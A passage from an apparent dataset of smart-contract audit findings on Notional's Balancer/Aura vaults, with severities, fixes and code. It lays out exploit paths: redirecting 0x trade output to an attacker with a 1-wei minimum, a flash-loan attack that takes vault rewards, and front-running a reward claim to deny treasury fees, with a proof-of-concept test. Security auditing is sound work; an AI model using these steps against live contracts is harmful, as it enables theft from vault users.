trade.amount : trade.limit;\\n Deployments.WETH.deposit{value: depositAmount }();\\n }\\n\\n (bool success, bytes memory returnData) = target.call{value: msgValue}(params);\\n if (!success) revert TradeExecution(returnData);\\n\\n if (trade.buyToken == address(Deployments.WETH)) {\\n if (address(this).balance > preTradeBalance) {\\n // If the caller specifies that they want to receive Deployments.WETH but we have received ETH,\\n // wrap the ETH to Deployments.WETH.\\n uint256 depositAmount;\\n unchecked { depositAmount = address(this).balance - preTradeBalance; }\\n Deployments.WETH.deposit{value: depositAmount}();\\n }\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS) {\\n uint256 postTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n if (postTradeBalance > preTradeBalance) {\\n // If the caller specifies that they want to receive ETH but we have received Deployments.WETH,\\n // unwrap the Deployments.WETH to ETH.\\n uint256 withdrawAmount;\\n unchecked { withdrawAmount = postTradeBalance - preTradeBalance; }\\n Deployments.WETH.withdraw(withdrawAmount);\\n }\\n }\\n}\\n```\\n -Bought/Purchased Token Can Be Sent To Attacker's Wallet Using 0x AdaptorчhighчThe lack of recipient validation against the 0x order within the 0x adaptor (ZeroExAdapter) allows the purchased/output tokens of the trade to be sent to the attacker's wallet.\\nBackground\\nHow does the emergency vault settlement process work?\\nAnyone can call the `settleVaultEmergency` function to trigger the emergency vault settlement as it is permissionless\\nThe `_getEmergencySettlementParams` function will calculate the excess BPT tokens within the vault to be settled/sold\\nThe amount of excess BPT tokens will be converted to an equivalence amount of strategy tokens to be settled\\nThe strategy tokens will be settled by withdrawing staked BPT tokens from Aura Finance back to the vault for redemption.\\nThe vault will then redeem the BTP tokens from Balancer to redeem its 
underlying assets (WETH and stETH)\\nThe primary and secondary assets of the vault are WETH and stETH respectively. The secondary asset (stETH) will be traded for the primary asset (WETH) in one of the supported DEXes. In the end, only the primary assets (WETH) should remain within the vault.\\nThe WETH within the vault will be sent to Notional, and Notional will mint the asset tokens (cEther) for the vault in return.\\nAfter completing the emergency vault settlement process, the vault will gain asset tokens (cEther) after settling/selling its excess BPT tokens.\\nIssue Description\\nThe caller of the `settleVaultEmergency` function can specify the trade parameters to sell the secondary tokens (stETH) for primary tokens (WETH) in any of the supported 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x) in Step 5 of the above emergency vault settlement process.\\nAfter analyzing the adaptors of 5 DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x), it was observed that Curve, Balancer V2, Uniswap V2, and Uniswap V3 are designed in a way that the purchased tokens can only be returned to the vault.\\nTake the Uniswap V2 adaptor as an example. When the vault triggers the trade execution, it will always pass its own address `address(this)` `to` the `from` parameter of the `getExecutionData` function. The value of `from` parameter will be passed `to` the `to` parameter of Uniswap's `swapExactTokensForTokens` function, which indicates the recipient of the output/purchased tokens. Therefore, it is impossible for the caller `to` specify the recipient of the output tokens `to` another address. 
This is also the same for Curve, Balancer V2, and Uniswap V3.\\n```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n\\nHowever, this is not implemented for the 0x adaptor (ZeroExAdapter). The `from` of the `getExecutionData` is completely ignored, and the caller has the full flexibility of crafting an order that benefits the caller.\\n```\\nFile: ZeroExAdapter.sol\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n}\\n```\\n\\nA number of features are supported by 0x. The full list of the supported features can be found here. Specifically, the following are the functions of attacker interest because it allows the attacker to configure the `recipient` parameter so that the bought tokens will be redirected to the attacker's wallet instead of the vault.\\nLiquidityProviderFeature - sellToLiquidityProvider\\n```\\n /// @dev Sells `sellAmount` of `inputToken` to the liquidity provider\\n /// at the given `provider` address.\\n /// @param inputToken The token being sold.\\n /// @param outputToken The token being bought.\\n /// @param provider The address of the on-chain liquidity provider\\n /// to trade with.\\n /// @param recipient The recipient of the bought tokens. 
If equal to\\n /// address(0), `msg.sender` is assumed to be the recipient.\\n /// @param sellAmount The amount of `inputToken` to sell.\\n /// @param minBuyAmount The minimum acceptable amount of `outputToken` to\\n /// buy. Reverts if this amount is not satisfied.\\n /// @param auxiliaryData Auxiliary data supplied to the `provider` contract.\\n /// @return boughtAmount The amount of `outputToken` bought.\\n function sellToLiquidityProvider(\\n IERC20TokenV06 inputToken,\\n IERC20TokenV06 outputToken,\\n ILiquidityProvider provider,\\n address recipient,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n bytes calldata auxiliaryData\\n )\\n```\\n\\nUniswapV3Feature - sellTokenForTokenToUniswapV3\\n```\\n /// @dev Sell a token for another token directly against uniswap v3.\\n /// @param encodedPath Uniswap-encoded path.\\n /// @param sellAmount amount of the first token in the path to sell.\\n /// @param minBuyAmount Minimum amount of the last token in the path to buy.\\n /// @param recipient The recipient of the bought tokens. Can be zero for sender.\\n /// @return buyAmount Amount of the last token in the path bought.\\n function sellTokenForTokenToUniswapV3(\\n bytes memory encodedPath,\\n uint256 sellAmount,\\n uint256 minBuyAmount,\\n address recipient\\n )\\n```\\n\\nThe malicious user could perform the following actions to steal the assets:\\nAllow malicious users to specify the recipient of the output/purchased tokens to be themselves instead of the vault. This will cause the output/purchased tokens of the trade to be redirected to the malicious users instead of the vault\\nSpecify the `minBuyAmount` parameter of the order to `1 WEI` so that he only needs to provide `1 WEI` to fill the order to obtain all the secondary token (stETH) that need to be sold. 
This is allowed as there is no slippage control within 0x adaptor (Refer to my \"No Slippage Control If The Trade Executes Via 0x DEX During Emergency Vault Settlement\" issue write-up)чIt is recommended to implement validation against the submitted 0x trade order to ensure that the recipient of the bought tokens is set to the vault when using the 0x DEX. Consider implementing the following validation checks.\\n```\\nlibrary ZeroExAdapter {\\n /// @dev executeTrade validates pre and post trade balances and also\\n /// sets and revokes all approvals. We are also only calling a trusted\\n /// zero ex proxy in this case. Therefore no order validation is done\\n /// to allow for flexibility.\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 /* msgValue */,\\n bytes memory executionCallData\\n )\\n {\\n spender = Deployments.ZERO_EX;\\n target = Deployments.ZERO_EX;\\n \\n _validateExchangeData(from, trade);\\n \\n // msgValue is always zero\\n executionCallData = trade.exchangeData;\\n }\\n \\n function _validateExchangeData(address from, Trade calldata trade) internal pure {\\n bytes calldata _data = trade.exchangeData;\\n\\n address inputToken;\\n address outputToken;\\n address recipient;\\n uint256 inputTokenAmount;\\n uint256 minOutputTokenAmount;\\n\\n require(_data.length >= 4, \"Invalid calldata\");\\n bytes4 selector;\\n assembly {\\n selector := and(\\n // Read the first 4 bytes of the _data array from calldata.\\n calldataload(add(36, calldataload(164))), // 164 = 5 * 32 + 4\\n 0xffffffff00000000000000000000000000000000000000000000000000000000\\n )\\n }\\n \\n if (selector == 0xf7fcd384) {\\n \\n (\\n inputToken, \\n outputToken, \\n , \\n recipient, \\n inputTokenAmount, \\n minOutputTokenAmount\\n ) = abi.decode(_data[4:], (address, address, address, address, uint256, uint256));\\n require(recipient == from, \"Mismatched recipient\");\\n } else if (selector == 
0x6af479b2) {\\n // sellTokenForTokenToUniswapV3()\\n bytes memory encodedPath;\\n // prettier-ignore\\n (\\n encodedPath,\\n inputTokenAmount, \\n minOutputTokenAmount, \\n recipient\\n ) = abi.decode(_data[4:], (bytes, uint256, uint256, address));\\n require(recipient == from, \"Mismatched recipient\");\\n }\\n }\\n}\\n```\\nчAttackers can craft a 0x order that redirects the assets to their wallet, leading to loss of assets for the vaults and their users.ч```\\nFile: UniV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n..SNIP..\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n```\\n -Settlement slippage is not implemented correctly which may lead to some vaults being impossible to settleчhighчThe contract is supposed to implement a different max slippage value depending on the settlement type, but these values have no impact because they are never actually applied. Instead, regardless of settlement type or function inputs, max slippage will always be limited to the value of balancerPoolSlippageLimitPercent. This can be problematic because the default value allows only 1% slippage. If settlement slippage goes outside of 1% then settlement of any kind will become impossible.\\nBoosted3TokenAuraHelper.sol#L95-L99\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n\\nBoosted3TokenAuraHelper#_executeSettlement first sets params.minPrimary overwriting any value from function input. 
Next it adjusts minPrimary by balancerPoolSlippageLimitPercent, which is a constant set at pool creation; however it doesn't ever adjust it by Params.DynamicTradeParams.oracleSlippagePercent. This means that the max possible slippage regardless of settlement type is limited to the slippage allowed by balancerPoolSlippageLimitPercent. If the max slippage ever goes outside of this range, then settlement of any kind will become impossible.чParams.DynamicTradeParams.oracleSlippagePercent is validated in every scenario before Boosted3TokenAuraHelper#_executeSettlement is called, so we can apply these values directly when calculating minPrimary:\\n```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n+ DynamicTradeParams memory callbackData = abi.decode(\\n+ params.secondaryTradeParams, (DynamicTradeParams)\\n+ );\\n\\n- params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n+ params.minPrimary = params.minPrimary * \\n+ (strategyContext.vaultSettings.balancerPoolSlippageLimitPercent - callbackData.oracleSlippagePercent) / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\nчSettlement may become impossibleч```\\n params.minPrimary = poolContext._getTimeWeightedPrimaryBalance(\\n oracleContext, strategyContext, bptToSettle\\n );\\n\\n params.minPrimary = params.minPrimary * strategyContext.vaultSettings.balancerPoolSlippageLimitPercent / \\n uint256(BalancerConstants.VAULT_PERCENT_BASIS);\\n```\\n -Gain From Balancer Vaults Can Be StolenчmediumчThe BPT gain (rewards) of the vault can be stolen by an attacker.\\nAt T0 (Time 0), assume that the state of the WETH/wstETH MetaPool Vault is as follows:\\ntotalBPTHeld = 1000 BPT\\ntotalStrategyTokenGlobal = 1000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens, and she is the only person invested in the vault at this point in time\\nAssume that if the `reinvestReward` is 
called, it will reinvest 1000 BPT back into the vault. Thus, if the `reinvestReward` is called, the `totalBPTHeld` of the vault will become 2000 BPT.\\nFollowing is the description of the attack:\\nThe attacker notice that if the `reinvestReward` is called, it will result in a large increase in the total BPT held by the vault\\nThe attacker flash-loan a large amount of WETH (e.g. 1,000,000) from a lending protocol (e.g. dydx)\\nEnter the vault by depositing 1,000,000 WETH by calling the `VaultAccountAction.enterVault` function. However, do not borrow any cash from Notional by setting the `fCash` parameter of the `VaultAccountAction.enterVault` function to `0`.\\nThere is no need to borrow from Notional as the attacker could already flash-loan a large amount of WETH with a non-existence fee rate (e.g. 1 Wei in dydx). Most importantly, the vault fee will only be charged if the user borrows from Notional. The fee is assessed within the `VaultAccount._borrowIntoVault`, which will be skipped if users are not borrowing. By not borrowing from Notional, the attacker does not need to pay any fee when entering the vault and this will make the attacker more profitable.\\nThe vault will deposit 1,000,000 WETH to the Balancer pool and receive a large amount of BPT in return. For simplicity's sake, assume that the vault receives 1,000,000 BPT in return.\\nBased on the `StrategyUtils._convertBPTClaimToStrategyTokens` function, the attacker will receive 100,000 strategy tokens. The state of the vault will be as follows after the attacker deposits:\\ntotalBPTHeld = 1,001,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim 1 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker calls the `reinvestReward` function, and reward tokens will be reinvested. Assume that the vault receives 1000 BPT. 
The state of the vault will be as follows after the reinvest:\\ntotalBPTHeld = 1,002,000 BPT\\ntotalStrategyTokenGlobal = 1,001,000\\n1 Strategy Token can claim ~1.0009 BPT\\nAlice holds 1000 Strategy Tokens\\nAttacker holds 1,000,000 Strategy Tokens\\nThe attacker exits the vault with all his strategy tokens by calling the `VaultAccountAction.exitVault` function. This will cause the vault the redeem all the 100,000 Strategy Tokens owned by the attacker. Based on the `StrategyUtils._convertStrategyTokensToBPTClaim` function, the attacker will receive 1,000,999 BPT in return. Note that there is no fee for exiting the vault and there is no need for repaying the debt as the attacker did not borrow any assets from Notional at the beginning.\\n```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n\\nProceed to repay the flash-loan at the end of the transaction. All the above steps are executed within a single transaction. Within a single transaction/block, the attacker is able to increase his holding of 1,000,000 BPT to 1,000,999 BPT after calling the `reinvestReward` function, and effectively gain around 999 BPT.\\nAlice who had been invested in the vault since the vault was first launched should be entitled to the majority of the rewards (Close to 1000 BPT). 
However, the attacker who came in right before the `reinvestReward` function was triggered managed to obtain almost all of her allocated shares of rewards (999 BPT) and left only 1 BPT for Alice.\\nNote: A flash-loan is not required if the attacker has sufficient liquidity to carry out the attack or the vault does not have much liquidity.\\nFollowing are the two functions for converting between BPT and Strategy Token for reference.\\n```\\n/// @notice Converts BPT to strategy tokens\\nfunction _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n}\\n```\\n\\n```\\n/// @notice Converts strategy tokens to BPT\\nfunction _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n}\\n```\\nчFollowing are the list of root causes of the issue and some recommendation to mitigate them.\\n`reinvestReward` function is permissionless and can be called by anyone. 
It is recommended to implement access control to ensure that this function can only be triggered by Notional. Do note that even if the attacker cannot trigger the `reinvestReward` function, it is still possible for the attacker to front-run and back-end the `reinvestReward` transaction to carry out the attack if they see this transaction in the public mempool. Thus, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot sandwich the transaction.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. If the user entered the vault in this block, he/she could only exit at the next block.\\nThere is no snapshotting to keep track of the deposit to ensure that BPT gain/rewards distributions are weighted according to deposit duration. Thus, a whale could deposit right before the `reinvestReward` function is triggered and exit the vault afterward and reap most of the gains. Consider implementing snapshotting within the vault.чLoss of assets for the users as their BPT gain (rewards) can be stolen. 
This issue affects all balancer-related vaults that contain the permissionless `reinvestReward` function.ч```\\nbptClaim = (strategyTokenAmount * context.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n1,000,999 = (1000000 * 1002000) / 1001000\\n```\\n -Malicious Users Can Deny Notional Treasury From Receiving FeeчmediumчMalicious users can deny Notional Treasury from receiving fees when rewards are reinvested.\\nThe `claimRewardTokens` function will harvest the reward tokens from the Aura Pool, and the reward tokens will be transferred to the Balancer Vault. At lines 77-78, a portion of the reward tokens would be sent to the `FEE_RECEIVER`. After clarifying with the sponsor, it was understood that the `FEE_RECEIVER` would be set to Notional Treasury so that it would receive some of the accrued reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n\\nWithin the `claimRewardTokens` function, it will call the `AURA_REWARD_POOL.getReward` to harvest 
the reward tokens. Within the `claimRewardTokens` function, it also uses the pre-balance and post-balance of the reward tokens to check the actual amount of reward tokens that are transferred into the vault.\\nHowever, the issue is that anyone can claim reward tokens from Aura Pool on behalf of any address. Following is the implementation of the `getReward` function taken from Aura's BaseRewardPool4626 contract called by the vault for reference.\\n```\\n/**\\n * @dev Gives a staker their rewards, with the option of claiming extra rewards\\n * @param _account Account for which to claim\\n * @param _claimExtras Get the child rewards too?\\n */\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n\\nmodifier updateReward(address account) {\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateTime = lastTimeRewardApplicable();\\n if (account != address(0)) {\\n rewards[account] = earned(account);\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n _;\\n}\\n\\nfunction earned(address account) public view returns (uint256) {\\n return\\n balanceOf(account)\\n .mul(rewardPerToken().sub(userRewardPerTokenPaid[account]))\\n .div(1e18)\\n .add(rewards[account]);\\n}\\n```\\n\\nAssume that a malicious user front runs a call to claim rewards tokens. When a keeper calls the `AURA_REWARD_POOL.getReward` to harvest the reward tokens, it will return no reward tokens, and therefore the difference between the pre-balance and post-balance of the reward tokens will amount to zero. 
Therefore, no reward tokens will be sent to the `FEE_RECEIVER` (Notional Treasury) as a fee.\\nProof-of-Concept\\nThe `test_claim_rewards_success` test case shows that under normal circumstances, the Notional treasury will receive a portion of the accrued BAL and AURA as fees.\\nThe `test_claim_rewards_success_frontrun` test case shows that if the `getReward` is front-run by an attacker, the Notional treasury will receive nothing.\\nThe following is the test script and its result.\\n```\\nimport pytest\\nfrom brownie import ZERO_ADDRESS, Wei, accounts, interface\\nfrom tests.fixtures import *\\nfrom tests.balancer.helpers import enterMaturity, get_metastable_amounts\\nfrom scripts.common import get_univ3_single_data, get_univ3_batch_data, DEX_ID, TRADE_TYPE\\n\\nchain = Chain()\\n\\ndef test_claim_rewards_success(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[\"baseStrategy\"][\"feeReceiver\"]\\n feePercentage = vault.getStrategyContext()[\"baseStrategy\"][\"vaultSettings\"][\"feePercentage\"] / 1e2\\n assert env.tokens[\"BAL\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"AURA\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) == 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) == 0\\n\\n vault.claimRewardTokens({\"from\": accounts[1]})\\n\\n # Test that the fee receiver received portion of the rewards as fee\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) > 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) > 0\\n\\ndef test_claim_rewards_success_frontrun(StratStableETHstETH):\\n (env, vault) = StratStableETHstETH\\n primaryBorrowAmount = 100e8\\n depositAmount = 50e18\\n enterMaturity(env, vault, 1, 0, depositAmount, primaryBorrowAmount, accounts[0])\\n 
chain.sleep(3600 * 24 * 365)\\n chain.mine()\\n feeReceiver = vault.getStrategyContext()[\"baseStrategy\"][\"feeReceiver\"]\\n feePercentage = vault.getStrategyContext()[\"baseStrategy\"][\"vaultSettings\"][\"feePercentage\"] / 1e2\\n assert env.tokens[\"BAL\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"AURA\"].balanceOf(vault.address) == 0\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) == 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) == 0\\n\\n auraPool = interface.IAuraRewardPool(vault.getStrategyContext()[\"stakingContext\"][\"auraRewardPool\"])\\n auraPool.getReward(vault.address, True, {\"from\": accounts[5]}) # Attacker frontrun the getReward\\n vault.claimRewardTokens({\"from\": accounts[1]})\\n\\n # Test that the fee receiver received nothing due the frontrunning\\n assert env.tokens[\"BAL\"].balanceOf(feeReceiver) == 0\\n assert env.tokens[\"AURA\"].balanceOf(feeReceiver) == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/rewards/test_rewards_stable_eth_steth.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 2 items \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/rewards/test_rewards_stable_eth_steth.py .. [100%]\\n\\n========================================================================================== 2 passed, 1 warning in 5.72s ===========================================================================================\\n```\\nчIt is recommended not to use the pre-balance and post-balance of the reward tokens when claiming reward tokens. 
A more robust internal accounting scheme needs to be implemented to keep track of actual reward tokens received from the pool so that the appropriate amount of the accrued reward tokens can be sent to the Notional Treasury.\\nReference\\nA similar high-risk issue was found in the past audit reportчNotional Treasury will not receive a portion of the accrued reward tokens as fees. Loss of assets for Notional protocol and its governance token holders.ч```\\nFile: AuraStakingMixin.sol\\n function claimRewardTokens() external returns (uint256[] memory claimedBalances) {\\n uint16 feePercentage = BalancerVaultStorage.getStrategyVaultSettings().feePercentage;\\n IERC20[] memory rewardTokens = _rewardTokens();\\n\\n uint256 numRewardTokens = rewardTokens.length;\\n\\n claimedBalances = new uint256[](numRewardTokens);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this));\\n }\\n\\n AURA_REWARD_POOL.getReward(address(this), true);\\n for (uint256 i; i < numRewardTokens; i++) {\\n claimedBalances[i] = rewardTokens[i].balanceOf(address(this)) - claimedBalances[i];\\n\\n if (claimedBalances[i] > 0 && feePercentage != 0 && FEE_RECEIVER != address(0)) {\\n uint256 feeAmount = claimedBalances[i] * feePercentage / BalancerConstants.VAULT_PERCENT_BASIS;\\n rewardTokens[i].checkTransfer(FEE_RECEIVER, feeAmount);\\n claimedBalances[i] -= feeAmount;\\n }\\n }\\n\\n emit BalancerEvents.ClaimedRewardTokens(rewardTokens, claimedBalances);\\n }\\n```\\n -Balancer Vault Will Receive Fewer Assets As The Current Design Does Not Serve The Interest Of Vault ShareholdersчmediumчThe current implementation of reinvesting reward function does not benefit the vault shareholders as the current design does not serve the vault shareholder's interest well. 
Thus, this will result in Balancer vaults receiving fewer assets.\\nThe `reinvestReward` function of the Balancer Vaults (MetaStable2TokenAuraVault and Boosted3TokenAuraVault) is permissionless and can be called by anyone. By calling `reinvestReward` function, the vault will trade the reward tokens received by the vault for tokens that are accepted by the balancer pool, and deposit them to the pool to obtain more BPT tokens for the vault shareholders. By continuously reinvesting the reward tokens into the pool, the vault shareholders will be able to lay claim to more BPT tokens per share over time.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n\\n```\\nFile: Boosted3TokenAuraHelper.sol\\n function reinvestReward(\\n Boosted3TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external { \\n```\\n\\nThe caller of the `reinvestReward` function can specify the trading configuration such as the DEX (e.g. Uniswap, Curve) that the trade should be executed and the slippage (params.tradeParams.oracleSlippagePercent). Note that the slippage defined must be equal to or less than the `strategyContext.vaultSettings.maxRewardTradeSlippageLimitPercent` setting that is currently set to 5% within the test scripts.\\nNotional Vaults support trading in multiple DEX protocols (Curve, Balancer V2, Uniswap V2 & V3 and 0x). Since `reinvestReward` function is callable by anyone, the liquidity provider of the supported DEX protocols will want the trade to be executed on the DEX pool that they invested on. This will allow them to earn an additional transaction fee from the trade. The amount of transaction fee earned will be significant if the volume is large when there are many vaults and reward tokens to be reinvested. In addition, the caller will set the slippage to the maximum configurable threshold (e.g. 
5% in this example) to maximize the profit. Therefore, this will end up having various liquidity providers front-running each other to ensure that their `reinvestReward` transaction gets executed in order to extract value.чIt is recommended to implement access control on the `reinvestReward` function to ensure that this function can only be triggered by Notional who has the best interest of its vault users.\\nAlso, consider sending the `reinvestReward` transaction as a private transaction via Flashbot so that the attacker cannot perform any kind of sandwich attack on the reinvest rewards transaction.чThis does not serve the vault shareholder's interest well as the caller of the `reinvestReward` function will not be trading and reinvesting in an optimal way that maximizes the value of the shareholder's assets in the vaults. There is a misalignment in the objective between the vault shareholders and callers. Therefore, the vault and its users will end up on the losing end and receive fewer assets than they should.ч```\\nFile: MetaStable2TokenAuraHelper.sol\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n```\\n -Existing Slippage Control Can Be Bypassed During Vault SettlementчmediumчThe existing slippage control can be bypassed/disabled during vault settlement, thus allowing the trade to be executed without consideration of its slippage.\\nNote 1: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nNote 2: This issue affects the following three (3) processes. However, the root cause and the remediation action are the same for all. Therefore, only the PoC for the \"Emergency vault settlement\" process will be documented in this report, and the other two processes will be omitted for brevity. 
Refer to \"Appendix I - Normal and Post Maturity Vault Settlement\" for more details.\\nEmergency vault settlement\\nNormal vault settlement\\nPost-Maturity vault settlement.\\nNote 3: The issue affects all the supported DEXs (Curve, Balancer V2, Uniswap V2, Uniswap V3 and 0x) within Notional\\nThe `emergencySettlementSlippageLimitPercent` of the vault is set to 10% as per the environment file provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n \"postMaturitySettlementSlippageLimitPercent\": 10e6, # 10%\\n \"emergencySettlementSlippageLimitPercent\": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultEmergency` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraHelper.sol\\n function settleVaultEmergency(\\n MetaStable2TokenAuraStrategyContext calldata context, \\n uint256 maturity, \\n bytes calldata data\\n ) external {\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.emergencySettlementSlippageLimitPercent,\\n data\\n );\\n\\n uint256 bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n poolContext: context.poolContext.basePool, \\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.pool).totalSupply()\\n });\\n```\\n\\nThe `SettlementUtils._decodeParamsAndValidate` function will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) passed in by the caller does not exceed the designated threshold (10%). In Line 41-42, the transaction will revert if the `DynamicTradeParams.oracleSlippagePercent` exceeds the `slippageLimitPercent`. Note that `slippageLimitPercent` is equal to `emergencySettlementSlippageLimitPercent` which is `10%`.\\nThere is an edge case with the condition at Line 41. 
